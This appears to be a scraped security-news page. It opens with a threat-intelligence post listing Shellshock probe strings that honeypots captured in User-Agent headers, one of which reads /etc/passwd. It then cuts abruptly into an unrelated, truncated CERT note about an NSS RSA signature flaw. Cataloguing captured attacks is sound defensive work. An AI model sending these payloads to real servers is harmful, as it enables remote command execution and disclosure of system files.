Tagged: intel

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Ever since the Shellshock vulnerability was announced, we have seen a large number of scans probing for it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 – Simple "vulnerability checks" that used custom User-Agents:

    () { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
    () { :;}; echo 'Shellshock: Vulnerable'
    () { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
    () { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a
    Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Content-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent

VU#772676: Mozilla Network Security Services (NSS) fails to properly verify RSA signatures

Vulnerability Note VU#772676

Original Release date: 24 Sep 2014 | Last revised: 24 Sep 2014

Overview

The Mozilla Network Security Services (NSS) library fails to properly verify RSA signatures due to incorrect ASN.1 parsing of DigestInfo. This vulnerability may allow an attacker to forge an RSA signature, such as an SSL certificate.

Description

CWE-295: Improper Certificate Validation

RSA signatures are used to authenticate the source of a message.